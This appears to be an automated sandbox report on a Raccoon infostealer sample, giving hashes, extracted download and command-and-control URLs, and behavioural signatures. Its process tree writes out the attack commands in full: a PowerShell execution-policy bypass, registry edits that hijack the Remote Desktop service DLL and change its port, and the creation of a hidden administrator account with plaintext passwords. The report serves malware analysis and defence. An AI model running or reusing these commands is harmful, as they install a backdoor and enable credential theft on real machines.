Analysis
-
max time kernel
68s -
max time network
127s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
02-06-2021 17:28
Static task
static1
Behavioral task
behavioral1
Sample
10e60e71017ffb4298307d929c3512d0.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
10e60e71017ffb4298307d929c3512d0.exe
Resource
win10v20210408
General
-
Target
10e60e71017ffb4298307d929c3512d0.exe
-
Size
567KB
-
MD5
10e60e71017ffb4298307d929c3512d0
-
SHA1
a71ad0c8b69b55912a12ec9b4c1e5cddaafc5014
-
SHA256
798204be3c87f8644d21f51035a29dd85e539e3969233ddda56a725461236717
-
SHA512
2018830b17e27a3395d1254e76c6e268fc4badcd6ab2c19f5dac67bf424c653ab685368b39b4a051240b482bcbe3439379abc321f5606e58de2b6e2378786d83
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
raccoon
e46634757936706c1ff491585768dd6fe231db30
-
url4cnc
https://tttttt.me/jdiamond13
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 19 3620 powershell.exe 21 3620 powershell.exe 22 3620 powershell.exe 23 3620 powershell.exe 25 3620 powershell.exe 27 3620 powershell.exe 29 3620 powershell.exe 31 3620 powershell.exe 33 3620 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
vMHNc4UoUH.exepid process 1316 vMHNc4UoUH.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 8 IoCs
Processes:
10e60e71017ffb4298307d929c3512d0.exepid process 4068 10e60e71017ffb4298307d929c3512d0.exe 4068 10e60e71017ffb4298307d929c3512d0.exe 4068 10e60e71017ffb4298307d929c3512d0.exe 4068 10e60e71017ffb4298307d929c3512d0.exe 4068 10e60e71017ffb4298307d929c3512d0.exe 4068 10e60e71017ffb4298307d929c3512d0.exe 3024 3024 -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_bwdx0bds.nfg.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3BA.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI487.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_fi14yxh4.qnp.ps1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI457.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI4D7.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI4B7.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 2112 timeout.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1400 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 21 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 23 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3956 powershell.exe 3956 powershell.exe 3956 powershell.exe 196 powershell.exe 196 powershell.exe 196 powershell.exe 1280 powershell.exe 1280 powershell.exe 1280 powershell.exe 3892 powershell.exe 3892 powershell.exe 3892 powershell.exe 3956 powershell.exe 3956 powershell.exe 3956 powershell.exe 3620 powershell.exe 3620 powershell.exe 3620 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 628 628 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3956 powershell.exe Token: SeDebugPrivilege 196 powershell.exe Token: SeIncreaseQuotaPrivilege 196 powershell.exe Token: SeSecurityPrivilege 196 powershell.exe Token: SeTakeOwnershipPrivilege 196 powershell.exe Token: SeLoadDriverPrivilege 196 powershell.exe Token: SeSystemProfilePrivilege 196 powershell.exe Token: SeSystemtimePrivilege 196 powershell.exe Token: SeProfSingleProcessPrivilege 196 powershell.exe Token: SeIncBasePriorityPrivilege 196 powershell.exe Token: SeCreatePagefilePrivilege 196 powershell.exe Token: SeBackupPrivilege 196 powershell.exe Token: SeRestorePrivilege 196 powershell.exe Token: SeShutdownPrivilege 196 powershell.exe Token: SeDebugPrivilege 196 powershell.exe Token: SeSystemEnvironmentPrivilege 196 powershell.exe Token: SeRemoteShutdownPrivilege 196 powershell.exe Token: SeUndockPrivilege 196 powershell.exe Token: SeManageVolumePrivilege 196 powershell.exe Token: 33 196 powershell.exe Token: 34 196 powershell.exe Token: 35 196 powershell.exe Token: 36 196 powershell.exe Token: SeDebugPrivilege 1280 powershell.exe Token: SeIncreaseQuotaPrivilege 1280 powershell.exe Token: SeSecurityPrivilege 1280 powershell.exe Token: SeTakeOwnershipPrivilege 1280 powershell.exe Token: SeLoadDriverPrivilege 1280 powershell.exe Token: SeSystemProfilePrivilege 1280 powershell.exe Token: SeSystemtimePrivilege 1280 powershell.exe Token: SeProfSingleProcessPrivilege 1280 powershell.exe Token: SeIncBasePriorityPrivilege 1280 powershell.exe Token: SeCreatePagefilePrivilege 1280 powershell.exe Token: SeBackupPrivilege 1280 powershell.exe Token: SeRestorePrivilege 1280 powershell.exe Token: SeShutdownPrivilege 1280 powershell.exe Token: SeDebugPrivilege 1280 powershell.exe Token: SeSystemEnvironmentPrivilege 1280 powershell.exe Token: SeRemoteShutdownPrivilege 1280 powershell.exe Token: SeUndockPrivilege 1280 powershell.exe Token: SeManageVolumePrivilege 1280 powershell.exe Token: 33 1280 powershell.exe Token: 34 1280 powershell.exe Token: 35 1280 powershell.exe Token: 36 1280 powershell.exe Token: SeDebugPrivilege 3892 powershell.exe Token: SeIncreaseQuotaPrivilege 3892 powershell.exe Token: SeSecurityPrivilege 3892 powershell.exe Token: SeTakeOwnershipPrivilege 3892 powershell.exe Token: SeLoadDriverPrivilege 3892 powershell.exe Token: SeSystemProfilePrivilege 3892 powershell.exe Token: SeSystemtimePrivilege 3892 powershell.exe Token: SeProfSingleProcessPrivilege 3892 powershell.exe Token: SeIncBasePriorityPrivilege 3892 powershell.exe Token: SeCreatePagefilePrivilege 3892 powershell.exe Token: SeBackupPrivilege 3892 powershell.exe Token: SeRestorePrivilege 3892 powershell.exe Token: SeShutdownPrivilege 3892 powershell.exe Token: SeDebugPrivilege 3892 powershell.exe Token: SeSystemEnvironmentPrivilege 3892 powershell.exe Token: SeRemoteShutdownPrivilege 3892 powershell.exe Token: SeUndockPrivilege 3892 powershell.exe Token: SeManageVolumePrivilege 3892 powershell.exe Token: 33 3892 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
10e60e71017ffb4298307d929c3512d0.execmd.exevMHNc4UoUH.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 4068 wrote to memory of 1316 4068 10e60e71017ffb4298307d929c3512d0.exe vMHNc4UoUH.exe PID 4068 wrote to memory of 1316 4068 10e60e71017ffb4298307d929c3512d0.exe vMHNc4UoUH.exe PID 4068 wrote to memory of 3628 4068 10e60e71017ffb4298307d929c3512d0.exe cmd.exe PID 4068 wrote to memory of 3628 4068 10e60e71017ffb4298307d929c3512d0.exe cmd.exe PID 4068 wrote to memory of 3628 4068 10e60e71017ffb4298307d929c3512d0.exe cmd.exe PID 3628 wrote to memory of 2112 3628 cmd.exe timeout.exe PID 3628 wrote to memory of 2112 3628 cmd.exe timeout.exe PID 3628 wrote to memory of 2112 3628 cmd.exe timeout.exe PID 1316 wrote to memory of 3956 1316 vMHNc4UoUH.exe powershell.exe PID 1316 wrote to memory of 3956 1316 vMHNc4UoUH.exe powershell.exe PID 3956 wrote to memory of 3844 3956 powershell.exe csc.exe PID 3956 wrote to memory of 3844 3956 powershell.exe csc.exe PID 3844 wrote to memory of 3236 3844 csc.exe cvtres.exe PID 3844 wrote to memory of 3236 3844 csc.exe cvtres.exe PID 3956 wrote to memory of 196 3956 powershell.exe powershell.exe PID 3956 wrote to memory of 196 3956 powershell.exe powershell.exe PID 3956 wrote to memory of 1280 3956 powershell.exe powershell.exe PID 3956 wrote to memory of 1280 3956 powershell.exe powershell.exe PID 3956 wrote to memory of 3892 3956 powershell.exe powershell.exe PID 3956 wrote to memory of 3892 3956 powershell.exe powershell.exe PID 3956 wrote to memory of 3620 3956 powershell.exe reg.exe PID 3956 wrote to memory of 3620 3956 powershell.exe reg.exe PID 3956 wrote to memory of 3192 3956 powershell.exe reg.exe PID 3956 wrote to memory of 3192 3956 powershell.exe reg.exe PID 3956 wrote to memory of 696 3956 powershell.exe reg.exe PID 3956 wrote to memory of 696 3956 powershell.exe reg.exe PID 3956 wrote to memory of 3904 3956 powershell.exe net.exe PID 3956 wrote to memory of 3904 3956 powershell.exe net.exe PID 3904 wrote to memory of 1536 3904 net.exe net1.exe PID 3904 wrote to memory of 1536 3904 net.exe net1.exe PID 3956 wrote to memory of 4024 3956 powershell.exe cmd.exe PID 3956 wrote to memory of 4024 3956 powershell.exe cmd.exe PID 4024 wrote to memory of 1812 4024 cmd.exe cmd.exe PID 4024 wrote to memory of 1812 4024 cmd.exe cmd.exe PID 1812 wrote to memory of 200 1812 cmd.exe net.exe PID 1812 wrote to memory of 200 1812 cmd.exe net.exe PID 200 wrote to memory of 3524 200 net.exe net1.exe PID 200 wrote to memory of 3524 200 net.exe net1.exe PID 3956 wrote to memory of 4064 3956 powershell.exe cmd.exe PID 3956 wrote to memory of 4064 3956 powershell.exe cmd.exe PID 4064 wrote to memory of 3236 4064 cmd.exe cmd.exe PID 4064 wrote to memory of 3236 4064 cmd.exe cmd.exe PID 3236 wrote to memory of 4004 3236 cmd.exe net.exe PID 3236 wrote to memory of 4004 3236 cmd.exe net.exe PID 4004 wrote to memory of 3564 4004 net.exe net1.exe PID 4004 wrote to memory of 3564 4004 net.exe net1.exe PID 2908 wrote to memory of 760 2908 cmd.exe net.exe PID 2908 wrote to memory of 760 2908 cmd.exe net.exe PID 760 wrote to memory of 1876 760 net.exe net1.exe PID 760 wrote to memory of 1876 760 net.exe net1.exe PID 2460 wrote to memory of 1484 2460 cmd.exe net.exe PID 2460 wrote to memory of 1484 2460 cmd.exe net.exe PID 1484 wrote to memory of 3440 1484 net.exe net1.exe PID 1484 wrote to memory of 3440 1484 net.exe net1.exe PID 3772 wrote to memory of 184 3772 cmd.exe net.exe PID 3772 wrote to memory of 184 3772 cmd.exe net.exe PID 184 wrote to memory of 2340 184 net.exe net1.exe PID 184 wrote to memory of 2340 184 net.exe net1.exe PID 3396 wrote to memory of 1152 3396 cmd.exe net.exe PID 3396 wrote to memory of 1152 3396 cmd.exe net.exe PID 1152 wrote to memory of 4068 1152 net.exe net1.exe PID 1152 wrote to memory of 4068 1152 net.exe net1.exe PID 196 wrote to memory of 2116 196 cmd.exe net.exe PID 196 wrote to memory of 2116 196 cmd.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\10e60e71017ffb4298307d929c3512d0.exe"C:\Users\Admin\AppData\Local\Temp\10e60e71017ffb4298307d929c3512d0.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\vMHNc4UoUH.exe"C:\Users\Admin\AppData\Local\Temp\vMHNc4UoUH.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'3⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hg0g4ial\hg0g4ial.cmdline"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB319.tmp" "c:\Users\Admin\AppData\Local\Temp\hg0g4ial\CSC353E46E6869D4CB6818D7855FD34F31D.TMP"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f4⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f4⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr7⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService7⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\10e60e71017ffb4298307d929c3512d0.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc LeRmx872 /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc LeRmx872 /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc LeRmx872 /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc LeRmx8721⤵
-
C:\Windows\system32\net.exenet.exe user wgautilacc LeRmx8722⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc LeRmx8723⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
-
